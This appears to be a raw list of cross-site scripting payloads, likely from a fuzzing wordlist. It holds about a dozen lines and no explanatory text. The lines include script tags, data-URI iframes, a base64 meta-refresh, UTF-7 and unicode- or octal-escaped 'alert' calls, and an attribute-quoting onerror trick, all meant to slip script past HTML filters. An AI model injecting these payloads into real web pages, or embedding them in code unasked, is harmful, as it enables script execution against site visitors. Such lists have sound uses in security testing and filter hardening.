<script>alert(1)</script>
"><script src=data:&comma;alert(1)//
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<iframe  src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
navigator.vibrate(500)
al\u0065rt(1)
<img src="/" =_=" title="onerror='prompt(1)'">
<embed src=javascript:alert(1)>
alert&#40;1&#41
top['al\145rt'](1)